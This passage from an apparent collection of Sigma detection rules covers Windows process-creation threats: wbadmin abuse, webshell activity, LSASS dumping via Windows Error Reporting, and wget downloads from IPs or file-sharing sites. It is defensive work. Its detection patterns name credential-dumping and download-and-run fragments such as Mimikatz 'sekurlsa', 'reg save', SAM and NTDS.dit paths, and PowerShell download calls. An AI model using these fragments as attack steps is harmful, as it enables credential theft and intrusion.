frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-13\nmodified: 2024-05-10\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'delete '\n            - 'backup' # Also covers \"SYSTEMSTATEBACKUP\"\n    filter_main_keep_versions:\n        # Note: We exclude this to avoid duplicate alerts with 639c9081-f482-47d3-a0bd-ddee3d4ecd76\n        CommandLine|contains: 'keepVersions:0'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate backup activity from administration scripts and software.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml",
    "content": "title: Sensitive File Dump Via Wbadmin.EXE\nid: 8b93a509-1cb8-42e1-97aa-ee24224cdc15\nstatus: test\ndescription: |\n    Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\n    Attackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml\n    - https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2024-05-10\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection_backup:\n        CommandLine|contains:\n            - 'start'\n            - 'backup'\n    selection_path:\n        CommandLine|contains:\n            - '\\config\\SAM'\n            - '\\config\\SECURITY'\n            - '\\config\\SYSTEM'\n            - '\\Windows\\NTDS\\NTDS.dit'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml",
    "content": "title: File Recovery From Backup Via Wbadmin.EXE\nid: 6fe4aa1e-0531-4510-8be2-782154b73b48\nrelated:\n    - id: 84972c80-251c-4c3a-9079-4f00aad93938\n      type: derived\nstatus: test\ndescription: |\n    Detects the recovery of files from backups via \"wbadmin.exe\".\n    Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery\n    - https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2024-05-10\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' recovery'\n            - 'recoveryTarget'\n            - 'itemtype:File'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml",
    "content": "title: Sensitive File Recovery From Backup Via Wbadmin.EXE\nid: 84972c80-251c-4c3a-9079-4f00aad93938\nrelated:\n    - id: 6fe4aa1e-0531-4510-8be2-782154b73b48\n      type: derived\nstatus: test\ndescription: |\n    Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\n    Attackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml\n    - https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2024-05-10\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection_backup:\n        CommandLine|contains|all:\n            - ' recovery'\n            - 'recoveryTarget'\n            - 'itemtype:File'\n        CommandLine|contains:\n            - '\\config\\SAM'\n            - '\\config\\SECURITY'\n            - '\\config\\SYSTEM'\n            - '\\Windows\\NTDS\\NTDS.dit'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webdav_lnk_execution.yml",
    "content": "title: Potentially Suspicious WebDAV LNK Execution\nid: 1412aa78-a24c-4abd-83df-767dfb2c5bbe\nrelated:\n    - id: f0507c0f-a3a2-40f5-acc6-7f543c334993\n      type: similar\nstatus: test\ndescription: Detects possible execution via LNK file accessed on a WebDAV server.\nreferences:\n    - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html\n    - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462\nauthor: Micah Babinski\ndate: 2023-08-21\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1204\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\explorer.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        CommandLine|contains: '\\DavWWWRoot\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webshell_chopper.yml",
    "content": "title: Chopper Webshell Process Pattern\nid: fa3c117a-bc0d-416e-a31b-0c0e80653efb\nstatus: test\ndescription: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/\nauthor: Florian Roth (Nextron Systems), MSTI (query)\ndate: 2022-10-01\ntags:\n    - attack.persistence\n    - attack.discovery\n    - attack.t1505.003\n    - attack.t1018\n    - attack.t1033\n    - attack.t1087\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_origin:\n        - Image|endswith: '\\w3wp.exe'\n        - ParentImage|endswith: '\\w3wp.exe'\n    selection_cmdline:\n        CommandLine|contains:\n            - '&ipconfig&echo'\n            - '&quser&echo'\n            - '&whoami&echo'\n            - '&c:&echo'\n            - '&cd&echo'\n            - '&dir&echo'\n            - '&echo [E]'\n            - '&echo [S]'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webshell_hacking.yml",
    "content": "title: Webshell Hacking Activity Patterns\nid: 4ebc877f-4612-45cb-b3a5-8e3834db36c9\nstatus: test\ndescription: |\n    Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system\nreferences:\n    - https://youtu.be/7aemGhaE9ds?t=641\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-17\nmodified: 2023-11-09\ntags:\n    - attack.persistence\n    - attack.discovery\n    - attack.t1505.003\n    - attack.t1018\n    - attack.t1033\n    - attack.t1087\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n   # Webserver\n    selection_webserver_image:\n        ParentImage|endswith:\n            - '\\caddy.exe'\n            - '\\httpd.exe'\n            - '\\nginx.exe'\n            - '\\php-cgi.exe'\n            - '\\w3wp.exe'\n            - '\\ws_tomcatservice.exe'\n    selection_webserver_characteristics_tomcat1:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentImage|contains:\n            - '-tomcat-'\n            - '\\tomcat'\n    selection_webserver_characteristics_tomcat2:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        CommandLine|contains:\n            - 'catalina.jar'\n            - 'CATALINA_HOME'\n    # Suspicious child processes\n    selection_child_1:\n        # Process dumping\n        CommandLine|contains|all:\n            - 'rundll32'\n            - 'comsvcs'\n    selection_child_2:\n        # Winrar exfil\n        CommandLine|contains|all:\n            - ' -hp'\n            - ' a '\n            - ' -m'\n    selection_child_3:\n        # User add\n        CommandLine|contains|all:\n            - 'net'\n            - ' user '\n            - ' /add'\n    selection_child_4:\n        CommandLine|contains|all:\n            - 'net'\n            - ' localgroup '\n            - ' administrators '\n            - '/add'\n    selection_child_5:\n        Image|endswith:\n            # Credential stealing\n            - '\\ntdsutil.exe'\n            # AD recon\n            - '\\ldifde.exe'\n            - '\\adfind.exe'\n            # Process dumping\n            - '\\procdump.exe'\n            - '\\Nanodump.exe'\n            # Destruction / ransom groups\n            - '\\vssadmin.exe'\n            - '\\fsutil.exe'\n    selection_child_6:\n        # SUspicious patterns\n        CommandLine|contains:\n            - ' -decode '  # Used with certutil\n            - ' -NoP '  # Often used in malicious PowerShell commands\n            - ' -W Hidden '  # Often used in malicious PowerShell commands\n            - ' /decode '  # Used with certutil\n            - ' /ticket:'  # Rubeus\n            - ' sekurlsa'  # Mimikatz\n            - '.dmp full'  # Process dumping method apart from procdump\n            - '.downloadfile('  # PowerShell download command\n            - '.downloadstring('  # PowerShell download command\n            - 'FromBase64String' # PowerShell encoded payload\n            - 'process call create' # WMIC process creation\n            - 'reg save '  # save registry SAM - syskey extraction\n            - 'whoami /priv'\n    condition: 1 of selection_webserver_* and 1 of selection_child_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml",
    "content": "title: Webshell Detection With Command Line Keywords\nid: bed2a484-9348-4143-8a8a-b801c979301c\nstatus: test\ndescription: Detects certain command line parameters often used during reconnaissance activity via web shells\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html\n    - https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\n    - https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community, Chad Hudson, Matt Anderson\ndate: 2017-01-01\nmodified: 2024-12-14\ntags:\n    - attack.persistence\n    - attack.discovery\n    - attack.t1505.003\n    - attack.t1018\n    - attack.t1033\n    - attack.t1087\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_webserver_image:\n        ParentImage|endswith:\n            - '\\w3wp.exe'\n            - '\\php-cgi.exe'\n            - '\\nginx.exe'\n            - '\\httpd.exe'\n            - '\\caddy.exe'\n            - '\\ws_tomcatservice.exe'\n    selection_webserver_characteristics_tomcat1:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentImage|contains:\n            - '-tomcat-'\n            - '\\tomcat'\n    selection_webserver_characteristics_tomcat2:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        CommandLine|contains:\n            - 'catalina.jar'\n            - 'CATALINA_HOME'\n    selection_susp_net_utility:\n        OriginalFileName:\n            - 'net.exe'\n            - 'net1.exe'\n        CommandLine|contains:\n            - ' user '\n            - ' use '\n            - ' group '\n    selection_susp_ping_utility:\n        OriginalFileName: 'ping.exe'\n        CommandLine|contains: ' -n '\n    selection_susp_change_dir:\n        CommandLine|contains:\n            - '&cd&echo'  # china chopper web shell\n            - 'cd /d '  # https://www.computerhope.com/cdhlp.htm\n    selection_susp_wmic_utility:\n        OriginalFileName: 'wmic.exe'\n        CommandLine|contains: ' /node:'\n    selection_susp_powershell_cli:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - ' -enc '\n            - ' -EncodedCommand '\n            - ' -w hidden '\n            - ' -windowstyle hidden'\n            - '.WebClient).Download'\n    selection_susp_misc_discovery_binaries:\n        - Image|endswith:\n              - '\\dsquery.exe'\n              - '\\find.exe'\n              - '\\findstr.exe'\n              - '\\ipconfig.exe'\n              - '\\netstat.exe'\n              - '\\nslookup.exe'\n              - '\\pathping.exe'\n              - '\\quser.exe'\n              - '\\schtasks.exe'\n              - '\\systeminfo.exe'\n              - '\\tasklist.exe'\n              - '\\tracert.exe'\n              - '\\ver.exe'\n              - '\\wevtutil.exe'\n              - '\\whoami.exe'\n        - OriginalFileName:\n              - 'dsquery.exe'\n              - 'find.exe'\n              - 'findstr.exe'\n              - 'ipconfig.exe'\n              - 'netstat.exe'\n              - 'nslookup.exe'\n              - 'pathping.exe'\n              - 'quser.exe'\n              - 'schtasks.exe'\n              - 'sysinfo.exe'\n              - 'tasklist.exe'\n              - 'tracert.exe'\n              - 'ver.exe'\n              - 'VSSADMIN.EXE'\n              - 'wevtutil.exe'\n              - 'whoami.exe'\n    selection_susp_misc_discovery_commands:\n        CommandLine|contains:\n            - ' Test-NetConnection '\n            - 'dir \\'  # remote dir: dir \\<redacted IP #3>\\C$:\\windows\\temp\\*.exe\n    condition: 1 of selection_webserver_* and 1 of selection_susp_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml",
    "content": "title: Suspicious Process By Web Server Process\nid: 8202070f-edeb-4d31-a010-a26c72ac5600\nstatus: test\ndescription: |\n    Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation\nreferences:\n    - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF\nauthor: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-16\nmodified: 2024-11-26\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1505.003\n    - attack.t1190\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_webserver_image:\n        ParentImage|endswith:\n            - '\\caddy.exe'\n            - '\\httpd.exe'\n            - '\\nginx.exe'\n            - '\\php-cgi.exe'\n            - '\\php.exe'\n            - '\\tomcat.exe'\n            - '\\UMWorkerProcess.exe'  # https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html\n            - '\\w3wp.exe'\n            - '\\ws_TomcatService.exe'\n    selection_webserver_characteristics_tomcat1:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentImage|contains:\n            - '-tomcat-'\n            - '\\tomcat'\n    selection_webserver_characteristics_tomcat2:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentCommandLine|contains:\n            - 'CATALINA_HOME'\n            - 'catalina.home'\n            - 'catalina.jar'\n    selection_anomaly_children:\n        Image|endswith:\n            - '\\arp.exe'\n            - '\\at.exe'\n            - '\\bash.exe'\n            - '\\bitsadmin.exe'\n            - '\\certutil.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\dsget.exe'\n            - '\\hostname.exe'\n            - '\\nbtstat.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\netdom.exe'\n            - '\\netsh.exe'\n            - '\\nltest.exe'\n            - '\\ntdsutil.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\qprocess.exe'\n            - '\\query.exe'\n            - '\\qwinsta.exe'\n            - '\\reg.exe'\n            - '\\rundll32.exe'\n            - '\\sc.exe'\n            - '\\sh.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            - '\\wusa.exe'\n    filter_main_fp_1:\n        ParentImage|endswith: '\\java.exe'\n        CommandLine|endswith: 'Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt'\n    filter_main_fp_2:\n        ParentImage|endswith: '\\java.exe'\n        CommandLine|contains|all:\n            - 'sc query'\n            - 'ADManager Plus'\n    condition: 1 of selection_webserver_* and selection_anomaly_children and not 1 of filter_main_*\nfalsepositives:\n    - Particular web applications may spawn a shell process legitimately\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_webshell_tool_recon.yml",
    "content": "title: Webshell Tool Reconnaissance Activity\nid: f64e5c19-879c-4bae-b471-6d84c8339677\nstatus: test\ndescription: |\n    Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands\nreferences:\n    - https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html\nauthor: Cian Heasley, Florian Roth (Nextron Systems)\ndate: 2020-07-22\nmodified: 2023-11-09\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_webserver_image:\n        ParentImage|endswith:\n            - '\\caddy.exe'\n            - '\\httpd.exe'\n            - '\\nginx.exe'\n            - '\\php-cgi.exe'\n            - '\\w3wp.exe'\n            - '\\ws_tomcatservice.exe'\n    selection_webserver_characteristics_tomcat1:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentImage|contains:\n            - '-tomcat-'\n            - '\\tomcat'\n    selection_webserver_characteristics_tomcat2:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        CommandLine|contains:\n            - 'CATALINA_HOME'\n            - 'catalina.jar'\n    selection_recon:\n        CommandLine|contains:\n            - 'perl --help'\n            - 'perl -h'\n            - 'python --help'\n            - 'python -h'\n            - 'python3 --help'\n            - 'python3 -h'\n            - 'wget --help'\n    condition: 1 of selection_webserver_* and selection_recon\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml",
    "content": "title: Potential Credential Dumping Via WER\nid: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3\nstatus: test\ndescription: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass\nreferences:\n    - https://github.com/deepinstinct/Lsass-Shtinkering\n    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\nauthor: '@pbssubhash , Nasreddine Bencherchali'\ndate: 2022-12-08\nmodified: 2022-12-09\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\Werfault.exe'\n        - OriginalFileName: 'WerFault.exe'\n    selection_cli:\n        ParentUser|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        User|contains:\n            - 'AUTHORI'\n            - 'AUTORI'\n        CommandLine|contains|all:\n            # Doc: WerFault.exe -u -p <target process> -ip <source process> -s <file mapping handle>\n            # Example: C:\\Windows\\system32\\Werfault.exe -u -p 744 -ip 1112 -s 244\n            # If the source process is not equal to the target process and the target process is LSASS then this is an indication of this technique\n            # Example: If the \"-p\" points the PID of \"lsass.exe\" and \"-ip\" points to a different process than \"lsass.exe\" then this is a sign of malicious activity\n            - ' -u -p '\n            - ' -ip '\n            - ' -s '\n    filter_lsass:\n        ParentImage: 'C:\\Windows\\System32\\lsass.exe'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml",
    "content": "title: Potential ReflectDebugger Content Execution Via WerFault.EXE\nid: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd\nrelated:\n    - id: 0cf2e1c6-8d10-4273-8059-738778f981ad\n      type: derived\nstatus: test\ndescription: Detects execution of \"WerFault.exe\" with the \"-pr\" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow\nreferences:\n    - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html\n    - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-30\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\WerFault.exe'\n        - OriginalFileName: 'WerFault.exe'\n    selection_cli:\n        CommandLine|contains: ' -pr '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse.yml",
    "content": "title: PPL Tampering Via WerFaultSecure\nid: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2\nrelated:\n    - id: 387df17d-3b04-448f-8669-9e7fd5e5fd8c\n      type: similar\n    - id: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential abuse of WerFaultSecure.exe to dump Protected Process Light (PPL) processes like LSASS or to freeze security solutions (EDR/antivirus).\n    This technique is used by tools such as EDR-Freeze and WSASS to bypass PPL protections and access sensitive information or disable security software.\n    Distinct command line patterns help identify the specific tool:\n    - WSASS usage typically shows: \"WSASS.exe WerFaultSecure.exe [PID]\" in ParentCommandLine\n    - EDR-Freeze usage typically shows: \"EDR-Freeze_[version].exe [PID] [timeout]\" in ParentCommandLine\n    Legitimate debugging operations using WerFaultSecure are rare in production environments and should be investigated.\nreferences:\n    - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n    - https://github.com/TwoSevenOneT/EDR-Freeze/blob/a7f61030b36fbde89871f393488f7075d2aa89f6/EDR-Freeze.cpp#L53\n    - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n    - https://github.com/TwoSevenOneT/WSASS/blob/2c8fd9fa32143e7bc9f066e9511c6f8a57bc64b5/WSASS.cpp#L251\nauthor: Jason (https://github.com/0xbcf)\ndate: 2025-09-23\nmodified: 2025-11-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        - Image|endswith: '\\WerFaultSecure.exe'\n        - OriginalFileName: 'WerFaultSecure.exe'\n    selection_args:\n        CommandLine|contains|all:\n            - ' /h '\n            - ' /pid ' # Antimalware or EDR process pid will be after this flag\n            - ' /tid '\n            - ' /encfile '\n            - ' /cancel '\n            - ' /type '\n            - ' 268310'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of WerFaultSecure for debugging purposes\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml",
    "content": "title: Suspicious Child Process Of Wermgr.EXE\nid: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e\nrelated:\n    - id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5\n      type: similar\nstatus: test\ndescription: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\n    - https://www.echotrail.io/insights/search/wermgr.exe\n    - https://github.com/binderlabs/DirCreate2System\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-14\nmodified: 2024-08-29\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\wermgr.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\ipconfig.exe'\n            - '\\mshta.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\netstat.exe'\n            - '\\nslookup.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\systeminfo.exe'\n            - '\\whoami.exe'\n            - '\\wscript.exe'\n    filter_main_rundll32:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains|all:\n            - 'C:\\Windows\\system32\\WerConCpl.dll'\n            - 'LaunchErcApp '\n        CommandLine|contains:\n            - '-queuereporting'\n            - '-responsepester'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wermgr_susp_exec_location.yml",
    "content": "title: Suspicious Execution Location Of Wermgr.EXE\nid: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5\nrelated:\n    - id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e\n      type: similar\nstatus: test\ndescription: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\n    - https://www.echotrail.io/insights/search/wermgr.exe\n    - https://github.com/binderlabs/DirCreate2System\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-14\nmodified: 2023-08-23\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\wermgr.exe'\n    filter_main_legit_location:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wget_download_direct_ip.yml",
    "content": "title: Suspicious File Download From IP Via Wget.EXE\nid: 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35\nstatus: test\ndescription: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe\nreferences:\n    - https://www.gnu.org/software/wget/manual/wget.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wget.exe'\n        - OriginalFileName: 'wget.exe'\n    selection_ip:\n        CommandLine|re: '://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        - CommandLine|re: '\\s-O\\s'\n        - CommandLine|contains: '--output-document'\n    selection_ext:\n        CommandLine|endswith:\n            # Note you can transform this into a \"contains\" to increase coverage but you would need to take care of some FP.\n            - '.ps1'\n            - \".ps1'\"\n            - '.ps1\"'\n            - '.dat'\n            - \".dat'\"\n            - '.dat\"'\n            - '.msi'\n            - \".msi'\"\n            - '.msi\"'\n            - '.bat'\n            - \".bat'\"\n            - '.bat\"'\n            - '.exe'\n            - \".exe'\"\n            - '.exe\"'\n            - '.vbs'\n            - \".vbs'\"\n            - '.vbs\"'\n            - '.vbe'\n            - \".vbe'\"\n            - '.vbe\"'\n            - '.hta'\n            - \".hta'\"\n            - '.hta\"'\n            - '.dll'\n            - \".dll'\"\n            - '.dll\"'\n            - '.psm1'\n            - \".psm1'\"\n            - '.psm1\"'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml",
    "content": "title: Suspicious File Download From File Sharing Domain Via Wget.EXE\nid: a0d7e4d2-bede-4141-8896-bc6e237e977c\nstatus: test\ndescription: Detects potentially suspicious file downloads from file sharing domains using wget.exe\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\nmodified: 2025-12-10\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wget.exe'\n        - OriginalFileName: 'wget.exe'\n    selection_websites:\n        CommandLine|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 